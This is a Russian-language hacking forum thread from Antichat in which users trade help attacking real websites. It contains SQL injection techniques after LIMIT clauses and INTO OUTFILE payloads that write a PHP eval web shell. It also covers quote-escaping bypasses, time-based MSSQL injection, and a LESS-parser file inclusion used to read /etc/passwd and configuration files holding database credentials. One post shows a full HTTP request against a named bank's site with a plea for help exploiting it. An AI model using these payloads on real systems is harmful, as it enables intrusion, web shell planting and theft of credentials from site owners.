Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    452
    Likes Received:
    765
    Reputations:
    289
    В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков.
     
    giloo and karkajoi like this.
  2. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    204
    Likes Received:
    96
    Reputations:
    1
    http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html изучаем, пробуем.
    Сразу надо оговорится, что длина вывода не будет превышать 32 символа вроде. Что б вывести все что 32+ символы(хэш например) надо воспользоватся функцией substring(hash,32)
     
    #2582 karkajoi, 11 Feb 2019
    Last edited: 11 Feb 2019
    giloo likes this.
  3. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Гайды перечитаны) уже голова трещит от них(
    Спасибо! Но вы дали ссылку на входящий параметр до LIMIT.
    У меня же можно инъектироваться после ORDER BY id LIMIT 0,5 <<ЗДЕСЬ>>
    Если я пробую UNION, то выдает ошибку что ORDER не совместим с UNION((
     
  4. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Нашла еще способ инъекции:
    SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO @var1,@var2
    Но кроме переменных ничего невозможно вставить(
    Так не хочет:

    SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO (SELECT 1),@var2
    Есть идеи у кого-нибудь?
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    341
    Reputations:
    98
    INTO - https://dev.mysql.com/doc/refman/8.0/en/select-into.html
    DoS Bug - https://nvd.nist.gov/vuln/detail/CVE-2015-4870
    Он давно пофиксен, подзапросы больше не работают! Можете вывести только, например, название текущей базы данных, версию и текущего пользователя от которого идет подключение!

    Если у пользователя есть права на запись в фс пробуйте:
    Code:
    ?q=1 into outfile '/path/to/shell.php' lines terminated by "<?php eval($_GET[e]);?>"--+
    
    ?q=1 into outfile '/path/to/shell.php' fields terminated by '' optionally enclosed by "<?php eval($_GET[e]);die();?>"--+
     
    giloo, panic.ker and crlf like this.
  6. giloo

    giloo New Member

    Joined:
    2 Feb 2019
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Спасибо! К несчастью сервер экранирует ковычки. А на строку в виде hex ругается... Значит здесь все? Никак нельзя?(
     
  7. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    204
    Likes Received:
    96
    Reputations:
    1
    char(), aes_decrypt(aes_encrypt())
     
  8. hshad

    hshad New Member

    Joined:
    14 Feb 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    есть инъекция вида
    Code:
    param=1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
    как выводить через нее что либо?
    и есть ли возможность подружить с мапом как-то?
     
    #2588 hshad, 14 Feb 2019
    Last edited: 16 Feb 2019
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    426
    Likes Received:
    46
    Reputations:
    40
    есть локальный инклуд позволяющий читать произвольные файлы /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../etc/passwd
    проблема в выводе которая ограничивается 6 строками есть идеи как обойти?
     
  10. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,201
    Likes Received:
    2,573
    Reputations:
    230
    Возможно, ограничение в вывод 6 строк, заложено изначально в серверном приложении, к которому идёт обращение и обработка скрипта.
     
    pinch likes this.
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    426
    Likes Received:
    46
    Reputations:
    40
    файлы с форматом less нормально читаются /style.less?update=e51qf61z&imports[]=/css/main/themes/default.less а вот с другими парсер выдает ошибку
    /* LESS COMPILE ERROR */
    /* ParseError: Unexpected input in robots.txt on line 1, column 10
    1| User-Agent: *
    2|
    3| Disallow: /1
    4| Disallow: /2
    5| Disallow: /3
    6| Disallow: /4 */
     
    altblitz likes this.
  12. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,201
    Likes Received:
    2,573
    Reputations:
    230
    Строку User-agent, сервер желает видеть не *, а вполне браузерного вида:
    Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0, не так ли?
     
  13. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    426
    Likes Received:
    46
    Reputations:
    40
    нет в etc/passwd такая же фигня ParseError: Unexpected input in passwd on line 1, column 15
     
  14. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    341
    Reputations:
    98
    Ну, 6 строк вывода в ошибке это тоже не плохо. Как вариант, попробуй почитать индексный файл и остальные файлы сайта, очень часто в первых строках идут подключения конфигов и прочих библиотек, возможно прочитав конфиг тебе повезет увидеть в первых 6-ти строках данные для подключения к бд, фтп и тд. (Если конечно эти строки не забитый комментариями разработчиков :D)
     
    pinch and ms13 like this.
  15. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,872
    Likes Received:
    682
    Reputations:
    198
    /proc/self/environ если инклуд а не читалка просто. ну или ававатрку залей с кодом если есть возможность
     
    _________________________
    pinch likes this.
  16. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    452
    Likes Received:
    765
    Reputations:
    289
    Не нарушать работу парсера. Если есть возможность как-то закинуть свою нагрузку (пример), можно попробовать так:

    Code:
    /style.less?update=e51qf61z&imports[]=../../../../../../../../../../../tmp/your_cool_file.jpg
    
    Содержимое your_cool_file.jpg:
    Code:
    @import (inline) "/etc/passwd";
    
     
    BillyBons and pinch like this.
  17. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    210
    Likes Received:
    54
    Reputations:
    0
    Hi friends
    Can you help me exploit this sql injection
    I tried but no result :(
    POST /cabinet HTTP/1.1
    Content-Length: 31
    Content-Type: application/x-www-form-urlencoded
    Referer: https://ne.birkart.az/
    Cookie: PHPSESSID=81d5c3c11f885d5bbe968db124eb5453; uslk_e=ZDQ0NmYyZDAtYzQzZC0yOGQxLTQ1MzItMDRhZWI1YmI2NzUw~~~~~~~1~; uslk_s=Idle%3B0~~0~0~0~~; __cfduid=d9efd55b42b5016584f8a88876936dbaa1540880719; __cfduid=d9efd55b42b5016584f8a88876936dbaa1540880719
    Host: ne.birkart.az
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

    action=check&birthday=1[injection-here]&cif=1[injection-here]

    Thanks!
     
  18. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    134
    Likes Received:
    23
    Reputations:
    1
    [​IMG]
    have you?

    This is really bad idea to run SQLi attack on banking if they didn't ask you to do.
     
  19. hibar1Xs

    hibar1Xs New Member

    Joined:
    30 Jan 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Не обойти?
    PHP:
    $f stripslashes($_GET['f']);
    if(!(
    strpos($f'..') === false) || strpos('./'$f) != || strpos($f"./") === false)
       { exit(
    'FALSE'); }
    ----------------------------------
    $_GET['f'] = 'wrapper://'
    $w = $_GET['f];
    Возможна ли работа враппера с конкатенацией: './'.$w ?
    readfile('./'.$_GET['f']);
     
    #2599 hibar1Xs, 21 Feb 2019 at 6:38 PM
    Last edited: 22 Feb 2019 at 5:31 PM
Loading...